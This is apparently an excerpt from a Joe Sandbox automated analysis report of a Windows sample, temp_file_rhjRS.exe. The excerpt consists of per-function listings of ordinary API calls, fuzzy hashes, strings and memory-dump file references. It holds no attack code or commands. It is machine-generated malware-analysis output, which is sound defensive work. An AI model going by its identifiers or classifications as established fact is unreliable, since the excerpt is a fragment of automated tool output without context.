Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Function 004060CC Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14

Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404054), ref: 00404237

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Non-executed Functions

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF

Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
wsprintfA.USER32 ref: 00405F2A
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F65
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F74
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
GlobalFree.KERNEL32(00000000), ref: 00406013
CloseHandle.KERNEL32(00000000), ref: 0040601A

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Strings

[Rename], xrefs: 00405F94, 00405FA6
%ls=%ls, xrefs: 00405F20

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD

Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

Strings

*?|<>/":, xrefs: 00406545
"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 004064F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3824308182
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD

Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404278
GetSysColor.USER32(00000000), ref: 00404294
SetTextColor.GDI32(?,00000000), ref: 004042A0
SetBkMode.GDI32(?,?), ref: 004042AC
GetSysColor.USER32(?), ref: 004042BF
SetBkColor.GDI32(?,?), ref: 004042CF
DeleteObject.GDI32(?), ref: 004042E9
CreateBrushIndirect.GDI32(?), ref: 004042F3

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54

Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
lstrcatW.KERNEL32(007A0F00,0040323B,0040323B,007A0F00,00000000,007924D8,759223A0), ref: 0040531E
SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
Opcode Fuzzy Hash: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(000BB666,00000064,000BB86A), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057D5
GetLastError.KERNEL32 ref: 004057E9
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
GetLastError.KERNEL32 ref: 00405808

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00405792

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3449924974-1943935188
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9

